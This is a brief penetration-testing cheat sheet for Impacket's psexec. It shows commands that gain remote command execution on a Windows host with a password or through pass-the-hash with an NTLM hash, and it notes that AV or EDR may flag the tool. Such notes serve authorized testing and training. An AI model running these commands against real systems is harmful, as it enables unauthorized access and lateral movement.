# Impacket toolsuite

# impacket-psexec

Very similar to the Microsoft Sysinternals tool. Instead of uploading psexecsv service binary, it uploads a service binary with a randome name. May be flagged with AV or EDR.

Running python psexec with credentials:

impacket-psexec user:password@10.10.10.10

Running python psexec with passing the hash:

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c user@10.10.10.10 cmd.exe